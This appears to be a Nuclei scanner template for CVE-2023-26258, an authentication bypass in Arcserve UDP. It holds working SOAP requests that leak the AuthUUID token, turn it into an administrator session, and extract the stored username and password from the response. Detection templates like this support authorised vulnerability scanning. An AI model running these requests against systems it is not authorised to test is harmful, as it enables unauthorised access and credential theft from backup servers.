id: CVE-2023-26258

info:
  name: Arcserve UDP <= 9.0.6034 - Authentication Bypass
  author: daffainfo
  severity: critical
  description: |
    Arcserve UDP through 9.0.6034 allows authentication bypass. The method getVersionInfo at WebServiceImpl/services/FlashServiceImpl leaks the AuthUUID token. This token can be used at /WebServiceImpl/services/VirtualStandbyServiceImpl to obtain a valid session. This session can be used to execute any task as administrator.
  impact: |
    Unauthenticated attackers can bypass authentication by leaking the AuthUUID token, allowing them to execute any administrative task and potentially compromise all backup data managed by Arcserve UDP.
  remediation: |
    Upgrade to Arcserve UDP version 9.1 or later that addresses this authentication bypass vulnerability.
  reference:
    - https://www.mdsec.co.uk/2023/06/cve-2023-26258-remote-code-execution-in-arcserve-udp-backup/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-26258
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-26258
    epss-score: 0.80773
    epss-percentile: 0.99167
    cwe-id: CWE-863
    cpe: cpe:2.3:a:arcserve:udp:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: arcserve
    product: udp
    shodan-query: http.favicon.hash:-1889244460
  tags: cve,cve2023,arcserve,auth-bypass,vkev,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /WebServiceImpl/services/FlashServiceImpl HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/xml

        <?xml version="1.0" encoding="UTF-8"?>
        <S:Envelope xmlns:S="http://schemas.xmlsoap.org/soap/envelope/">
          <S:Body>
            <ns2:getVersionInfo
                xmlns:ns2="http://webservice.arcflash.ca.com"
                xmlns:ns3="http://backup.data.webservice.arcflash.ca.com/xsd"
                xmlns:ns4="http://data.webservice.arcflash.ca.com/xsd"
                xmlns:ns5="http://export.data.webservice.arcflash.ca.com/xsd"
                xmlns:ns6="http://vsphere.data.webservice.arcflash.ca.com/xsd"
                xmlns:ns7="http://browse.data.webservice.arcflash.ca.com/xsd"
                xmlns:ns8="http://restore.data.webservice.arcflash.ca.com/xsd"
                xmlns:ns9="http://catalog.data.webservice.arcflash.ca.com/xsd"
                xmlns:ns10="http://activitylog.data.webservice.arcflash.ca.com/xsd"
                xmlns:ns11="http://remotedeploy.data.webservice.arcflash.ca.com/xsd"
                xmlns:ns12="http://history.job.data.webservice.arcflash.ca.com/xsd"
                xmlns:ns13="http://webservice.edge.arcserve.ca.com/"/>
          </S:Body>
        </S:Envelope>

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "text/xml")'
          - 'contains(body, "ns5:authUUID")'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: auth_uuid
        group: 1
        part: body
        internal: true
        regex:
          - '<ns5:authUUID>([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})</ns5:authUUID>'

  - raw:
      - |
        POST /WebServiceImpl/services/VirtualStandbyServiceImpl HTTP/1.1
        Host: {{Hostname}}
        SOAPAction: "<http://webservice.arcflash.ca.com/IEdgeDashboardService/validateUserByUUIDRequest>"
        Content-Type: text/xml

        <?xml version="1.0" encoding="UTF-8"?>
        <S:Envelope xmlns:S="http://schemas.xmlsoap.org/soap/envelope/">
          <S:Body>
            <ns2:validateUserByUUID
                xmlns:ns2="http://webservice.arcflash.ca.com"
                xmlns:ns3="http://backup.data.webservice.arcflash.ca.com/xsd"
                xmlns:ns4="http://data.webservice.arcflash.ca.com/xsd"
                xmlns:ns5="http://export.data.webservice.arcflash.ca.com/xsd"
                xmlns:ns6="http://vsphere.data.webservice.arcflash.ca.com/xsd"
                xmlns:ns7="http://browse.data.webservice.arcflash.ca.com/xsd"
                xmlns:ns8="http://restore.data.webservice.arcflash.ca.com/xsd"
                xmlns:ns9="http://catalog.data.webservice.arcflash.ca.com/xsd"
                xmlns:ns10="http://activitylog.data.webservice.arcflash.ca.com/xsd"
                xmlns:ns11="http://remotedeploy.data.webservice.arcflash.ca.com/xsd"
                xmlns:ns12="http://history.job.data.webservice.arcflash.ca.com/xsd"
                xmlns:ns13="http://webservice.edge.arcserve.ca.com/">
                <arg0>{{auth_uuid}}</arg0>
            </ns2:validateUserByUUID>
          </S:Body>
        </S:Envelope>

      - |
        POST /WebServiceImpl/services/FlashServiceImpl HTTP/1.1
        Host: {{Hostname}}
        SOAPAction: "<http://webservice.arcflash.ca.com/IFlashService_R16_5/getVersionInfoRequest>"
        Content-Type: text/xml

        <?xml version="1.0" encoding="UTF-8"?>
          <S:Envelope xmlns:S="http://schemas.xmlsoap.org/soap/envelope/">
            <S:Body>
              <ns2:getLocalHostAsTrust
                xmlns:ns2="http://webservice.arcflash.ca.com"
                xmlns:ns3="http://backup.data.webservice.arcflash.ca.com/xsd"
                xmlns:ns4="http://data.webservice.arcflash.ca.com/xsd"
                xmlns:ns5="http://export.data.webservice.arcflash.ca.com/xsd"
                xmlns:ns6="http://vsphere.data.webservice.arcflash.ca.com/xsd"
                xmlns:ns7="http://browse.data.webservice.arcflash.ca.com/xsd"
                xmlns:ns8="http://restore.data.webservice.arcflash.ca.com/xsd"
                xmlns:ns9="http://catalog.data.webservice.arcflash.ca.com/xsd"
                xmlns:ns10="http://activitylog.data.webservice.arcflash.ca.com/xsd"
                xmlns:ns11="http://remotedeploy.data.webservice.arcflash.ca.com/xsd"
                xmlns:ns12="http://history.job.data.webservice.arcflash.ca.com/xsd"
                xmlns:ns13="http://webservice.edge.arcserve.ca.com/"
              >
              </ns2:getLocalHostAsTrust>
            </S:Body>
          </S:Envelope>

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "text/xml")'
          - 'contains_all(body, "ns5:uuid", "ns5:userName", "ns5:password")'
        condition: and

    extractors:
      - type: regex
        group: 1
        part: body
        regex:
          - '<ns5:userName>(.*?)</ns5:userName>'

      - type: regex
        group: 1
        part: body
        regex:
          - '<ns5:password>(.*?)</ns5:password>'
# digest: 4a0a00473045022100b48b9b643a5743500378cc2530f8a06f46e58044136fc1ddfa083524fe6c976a022050ffc2377a9614d9596f48a3c72ad7161b2b4b3b0bdc037fad4ad169a20b3332:922c64590222798bb761d5b6d8e72950